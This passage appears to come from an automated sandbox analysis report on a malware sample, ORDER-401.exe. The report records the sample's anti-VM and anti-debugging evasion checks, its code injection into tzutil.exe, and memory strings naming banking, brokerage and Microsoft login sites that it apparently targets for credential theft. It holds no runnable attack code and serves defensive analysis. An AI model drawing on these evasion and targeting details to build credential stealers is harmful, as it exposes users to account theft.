                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: ORDER-401.exe PID: 7724, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 4BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 7CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 7420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158096E rdtsc 4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\ORDER-401.exe TID: 7744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4472Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4472Thread sleep time: -64000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe TID: 5628Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028CC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_028CC9D0
                Source: C:\Users\user\Desktop\ORDER-401.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696494690^
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: discord.comVMware20,11696494690f
                Source: UQ63g7r-.8.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: UQ63g7r-.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: UQ63g7r-.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696494690h
                Source: UQ63g7r-.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: UQ63g7r-.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - HKVMware20,11696494690]
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696494690
                Source: firefox.exe, 0000000B.00000002.2400295346.000001D163C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169649<[_
                Source: UQ63g7r-.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: UQ63g7r-.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696494690x
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696494690x
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: UQ63g7r-.8.drBinary or memory string: global block list test formVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: UQ63g7r-.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3255934217.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluuq
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: tzutil.exe, 00000008.00000002.3261301697.0000000007D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696494690
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt'SZ
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: UQ63g7r-.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158096E rdtsc 4_2_0158096E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00417B63 LdrLoadDll,4_2_00417B63
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546154 mov eax, dword ptr fs:[00000030h]4_2_01546154
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01546154 mov eax, dword ptr fs:[00000030h]4_2_01546154
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153C156 mov eax, dword ptr fs:[00000030h]4_2_0153C156
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D8158 mov eax, dword ptr fs:[00000030h]4_2_015D8158
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h]4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h]4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D4144 mov ecx, dword ptr fs:[00000030h]4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h]4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D4144 mov eax, dword ptr fs:[00000030h]4_2_015D4144
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EA118 mov ecx, dword ptr fs:[00000030h]4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h]4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h]4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EA118 mov eax, dword ptr fs:[00000030h]4_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov eax, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE10E mov ecx, dword ptr fs:[00000030h]4_2_015EE10E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01570124 mov eax, dword ptr fs:[00000030h]4_2_01570124
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01600115 mov eax, dword ptr fs:[00000030h]4_2_01600115
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016161E5 mov eax, dword ptr fs:[00000030h]4_2_016161E5
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h]4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h]4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE1D0 mov ecx, dword ptr fs:[00000030h]4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h]4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BE1D0 mov eax, dword ptr fs:[00000030h]4_2_015BE1D0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016061C3 mov eax, dword ptr fs:[00000030h]4_2_016061C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016061C3 mov eax, dword ptr fs:[00000030h]4_2_016061C3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015701F8 mov eax, dword ptr fs:[00000030h]4_2_015701F8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C019F mov eax, dword ptr fs:[00000030h]4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C019F mov eax, dword ptr fs:[00000030h]4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C019F mov eax, dword ptr fs:[00000030h]4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C019F mov eax, dword ptr fs:[00000030h]4_2_015C019F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h]4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h]4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A197 mov eax, dword ptr fs:[00000030h]4_2_0153A197
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FC188 mov eax, dword ptr fs:[00000030h]4_2_015FC188
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FC188 mov eax, dword ptr fs:[00000030h]4_2_015FC188
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01580185 mov eax, dword ptr fs:[00000030h]4_2_01580185
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E4180 mov eax, dword ptr fs:[00000030h]4_2_015E4180
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E4180 mov eax, dword ptr fs:[00000030h]4_2_015E4180
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01542050 mov eax, dword ptr fs:[00000030h]4_2_01542050
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C6050 mov eax, dword ptr fs:[00000030h]4_2_015C6050
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156C073 mov eax, dword ptr fs:[00000030h]4_2_0156C073
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h]4_2_0155E016
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h]4_2_0155E016
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h]4_2_0155E016
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E016 mov eax, dword ptr fs:[00000030h]4_2_0155E016
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C4000 mov ecx, dword ptr fs:[00000030h]4_2_015C4000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E2000 mov eax, dword ptr fs:[00000030h]4_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D6030 mov eax, dword ptr fs:[00000030h]4_2_015D6030
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A020 mov eax, dword ptr fs:[00000030h]4_2_0153A020
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153C020 mov eax, dword ptr fs:[00000030h]4_2_0153C020
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C20DE mov eax, dword ptr fs:[00000030h]4_2_015C20DE
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153C0F0 mov eax, dword ptr fs:[00000030h]4_2_0153C0F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015820F0 mov ecx, dword ptr fs:[00000030h]4_2_015820F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0153A0E3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C60E0 mov eax, dword ptr fs:[00000030h]4_2_015C60E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015480E9 mov eax, dword ptr fs:[00000030h]4_2_015480E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016060B8 mov eax, dword ptr fs:[00000030h]4_2_016060B8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016060B8 mov ecx, dword ptr fs:[00000030h]4_2_016060B8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154208A mov eax, dword ptr fs:[00000030h]4_2_0154208A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D80A8 mov eax, dword ptr fs:[00000030h]4_2_015D80A8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov eax, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov eax, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov eax, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov ecx, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov eax, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C035C mov eax, dword ptr fs:[00000030h]4_2_015C035C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E8350 mov ecx, dword ptr fs:[00000030h]4_2_015E8350
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C2349 mov eax, dword ptr fs:[00000030h]4_2_015C2349
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E437C mov eax, dword ptr fs:[00000030h]4_2_015E437C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160A352 mov eax, dword ptr fs:[00000030h]4_2_0160A352
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153C310 mov ecx, dword ptr fs:[00000030h]4_2_0153C310
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01560310 mov ecx, dword ptr fs:[00000030h]4_2_01560310
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A30B mov eax, dword ptr fs:[00000030h]4_2_0157A30B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A30B mov eax, dword ptr fs:[00000030h]4_2_0157A30B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157A30B mov eax, dword ptr fs:[00000030h]4_2_0157A30B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE3DB mov eax, dword ptr fs:[00000030h]4_2_015EE3DB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE3DB mov eax, dword ptr fs:[00000030h]4_2_015EE3DB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE3DB mov ecx, dword ptr fs:[00000030h]4_2_015EE3DB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EE3DB mov eax, dword ptr fs:[00000030h]4_2_015EE3DB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E43D4 mov eax, dword ptr fs:[00000030h]4_2_015E43D4
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E43D4 mov eax, dword ptr fs:[00000030h]4_2_015E43D4
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FC3CD mov eax, dword ptr fs:[00000030h]4_2_015FC3CD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154A3C0 mov eax, dword ptr fs:[00000030h]4_2_0154A3C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015483C0 mov eax, dword ptr fs:[00000030h]4_2_015483C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015483C0 mov eax, dword ptr fs:[00000030h]4_2_015483C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015483C0 mov eax, dword ptr fs:[00000030h]4_2_015483C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015483C0 mov eax, dword ptr fs:[00000030h]4_2_015483C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C63C0 mov eax, dword ptr fs:[00000030h]4_2_015C63C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E3F0 mov eax, dword ptr fs:[00000030h]4_2_0155E3F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E3F0 mov eax, dword ptr fs:[00000030h]4_2_0155E3F0
